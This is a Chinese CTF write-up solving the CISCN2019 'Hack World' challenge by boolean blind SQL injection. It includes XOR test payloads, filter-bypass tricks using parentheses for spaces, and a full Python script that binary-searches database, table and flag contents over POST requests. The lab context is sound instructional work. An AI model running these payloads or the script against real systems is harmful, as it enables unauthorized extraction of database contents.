[CISCN2019 华北赛区 Day2 Web1]Hack World1

提示

  1. 基于布尔的盲注
  2. 使用python脚本跑

这里已经提示flag在flag表在flag字段

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第1张图片

首先输入1   2都能有回显

每当这个时候第一想到的都应该是基于布尔的盲注是否能使用

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第2张图片[CISCN2019 华北赛区 Day2 Web1]Hack World1_第3张图片

尝试fuzz

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第4张图片

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第5张图片

通过fuzz大概知道后续思路

  1. 应为过滤的比较全面所以放弃联合查询  报错查询  预设置  
  2. 使用基于布尔的盲注

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第6张图片

这里首先测试是否能使用基于布尔的盲注

1^1^1=1   1^0^1=0,就像是真真真等于真,真假真等于假(后续我们需要利用这一点)

payload:  1^1^1

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第7张图片

payload:   1^0^1

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第8张图片

可行

这里使用python编写脚本(应为已经告诉了flag在flag表flag字段里所以直接跳过查表查字段)

应为禁用了空格所以用()代替

import requests as re

# 设置需要sql注入的网站
url = 'http://829f8090-4b37-44d3-bd7c-84540e34523d.node4.buuoj.cn:81/index.php'

# 提前做好接受flag的变量
flag = ''

# 循环函数
for i in range(1, 1000):
    print(f'{i}:\n')
    # 这里设置最大值和最小值使用二分化的方法跑效率比一般的快超级多
    high = 128
    low = 30
    # 这里设置循环函数,如果最大值小于最小值那么退出
    while low <= high:
        mid = (low + high)//2
        # 爆库名
        # sql1 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))={mid})^1'
        # sql2 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))>{mid})^1'
        # sql3 = f'1^(ascii(substr((select(group_concat(schema_name))from(information_schema.schemata)),{i},1))<{mid})^1'
        # 爆表名
        # sql1 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))={mid})^1'
        # sql2 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))>{mid})^1'
        # sql3 = f'1^(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(table_schema=database())),{i},1))<{mid})^1'
        # 爆字段名
        sql1 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))={mid})^1'
        sql2 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))>{mid})^1'
        sql3 = f'1^(ascii(substr((select(flag)from(flag)),{i},1))<{mid})^1'

        # 设置id值
        data1 = {
            'id': sql1
        }
        data2 = {
            'id': sql2
        }
        data3 = {
            'id': sql3
        }

        # 通过post传入参数然后给r1 r2 r3
        r1 = re.post(url=url, data=data1)
        r2 = re.post(url=url, data=data2)
        r3 = re.post(url=url, data=data3)

        # Hello出现在页面时说明是对的,输出flag
        if 'Hello' in r1.text:
            flag += chr(mid)
            print(flag)
            break
        # Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值,所以缩小范围到中间值到最大值,一步一步缩小找到flag
        if 'Hello' in r2.text:
            low = mid + 1
        # Hello出现在页面时说明flag的ascii值大于最小值和最大值的中间值,所以缩小范围到中间值到最大值,一步一步缩小找到flag
        if 'Hello' in r3.text:
            high = mid - 1
    continue

print(flag)

得到flag

注意当网速不好的时候可能会出现一下情况,多跑几次就行

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第9张图片

[CISCN2019 华北赛区 Day2 Web1]Hack World1_第10张图片

你可能感兴趣的:(BUUCTF,web题,数据库,mysql,sql,ctf)